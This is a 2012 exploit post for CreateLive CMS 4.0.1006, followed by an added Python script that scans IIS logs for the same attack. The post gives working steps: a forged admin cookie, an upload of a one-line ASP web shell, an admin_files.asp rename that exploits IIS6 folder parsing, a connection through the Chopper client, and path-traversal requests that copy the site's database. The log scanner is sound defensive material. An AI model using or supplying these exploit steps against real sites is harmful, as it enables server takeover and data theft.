title: CreateLive CMS v4.0 vulnerability, get shell without the admin back end -- 2012-03-06 17:28
Title: CreateLive CMS Version 4.0.1006 vulnerability: get shell without the admin back end
Required environment: IIS6, with script execution allowed in the upload directory
CreateLive CMS Version 4.0.1006 is a very old, outdated CMS.
--------------------------------------------------------------------------------------------------------------- --------------------------------
When I got hold of a very old site, I found that it was running CreateLive CMS version 4.0.1006.
Among its many holes, here is one.
Register a user and log in.
Modify the cookie: usergroupid=1&password=798fb0743e519ec0&username=admin&userid=1
Save the cookie, then open:
http://XXX.XXX.XXX.XXX/dlugis/user/upload.asp?action=F&id=3&type=0
Change the value of id as required.
Upload a one-line ASP web shell.
View the file directory:
http://xxx.xxx.xxx.xxx/dlugis/admin/admin_files.asp?action=main&filetype=select&channelid=2&Thisdir=./photo/2012-3
Rename the folder:
http://xxx.xxx.xxx.xxx/dlugis/admin/admin_files.asp?action=rname&filetype=select&channelid=3&Folderid=2012-3&newname=ok.asp
Check whether it succeeded.
Connect with Chopper.
http://xxx.xxx.xxx.xxx/dlugis/admin/admin_files.asp?action=rname&filetype=select&channelid=3&Fileid=./../data/%23cl_count.mdb&newname=ok
This copies the database file from the other directory to the current directory, with the file name ok.mdb.
http://xxx.xxx.xxx.xxx/dlugis/admin/admin_files.asp?action=main&filetype=select&channelid=2&Thisdir=./../../
This browses the directories.
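
For checking IIS logs for the requests described above, here is an added example (not part of the original post) that flags the admin_files.asp rename, traversal and database-file patterns, plus requests served from a script-named folder. The field order, rule names, sample lines, addresses and the file name under ok.asp are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs

# Default IIS 6 W3C field order (assumed; follow the log's own #Fields line).
FIELDS = ("date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username "
          "c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status").split()
# .asp is from the post; .asa/.cer/.cdx are also mapped to asp.dll by default on IIS 6.
SCRIPT_EXT = re.compile(r"\.(asp|asa|cer|cdx)$", re.I)
SCRIPT_DIR = re.compile(r"\.(asp|asa|cer|cdx)/", re.I)

def findings(line):
    """Return the rule names one W3C log line triggers (query values are URL-decoded)."""
    if not line.strip() or line.startswith("#"):
        return []
    rec = dict(zip(FIELDS, line.split()))
    stem = rec.get("cs-uri-stem", "").lower()
    qs = {k.lower(): v[0] for k, v in parse_qs(rec.get("cs-uri-query", "-")).items()}
    hits = []
    if SCRIPT_DIR.search(stem):
        hits.append("request-under-script-named-folder")
    if stem.endswith("/admin_files.asp"):
        if qs.get("action", "").lower() == "rname" and SCRIPT_EXT.search(qs.get("newname", "")):
            hits.append("rename-to-script-extension")
        paths = [qs.get(p, "") for p in ("thisdir", "fileid", "folderid")]
        if any(".." in re.split(r"[\\/]", p) for p in paths):
            hits.append("path-traversal-parameter")
        if any(p.lower().endswith(".mdb") for p in paths):
            hits.append("database-file-referenced")
    return hits

def scan(log_text):
    """Map client IP -> sorted rule names seen from that address."""
    out = {}
    for line in log_text.splitlines():
        hits = findings(line)
        if hits:
            out.setdefault(line.split()[FIELDS.index("c-ip")], set()).update(hits)
    return {ip: sorted(h) for ip, h in out.items()}

# Constructed sample lines (not real traffic); addresses are documentation ranges.
SAMPLE_LOG = """\
2012-03-06 09:00:01 192.0.2.10 GET /dlugis/index.asp - 80 - 203.0.113.5 Mozilla/4.0 200 0 0
2012-03-06 09:01:10 192.0.2.10 GET /dlugis/admin/admin_files.asp action=rname&filetype=select&channelid=3&Folderid=2012-3&newname=ok.asp 80 - 198.51.100.7 Mozilla/4.0 200 0 0
2012-03-06 09:02:30 192.0.2.10 GET /dlugis/admin/admin_files.asp action=rname&filetype=select&channelid=3&Fileid=./../data/%23cl_count.mdb&newname=ok 80 - 198.51.100.7 Mozilla/4.0 200 0 0
2012-03-06 09:03:00 192.0.2.10 POST /dlugis/photo/ok.asp/item - 80 - 198.51.100.7 Mozilla/4.0 200 0 0
"""

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

Any hit on admin_files.asp from a session that is not a known administrator is worth correlating with the cs(Cookie) field, if cookie logging is enabled.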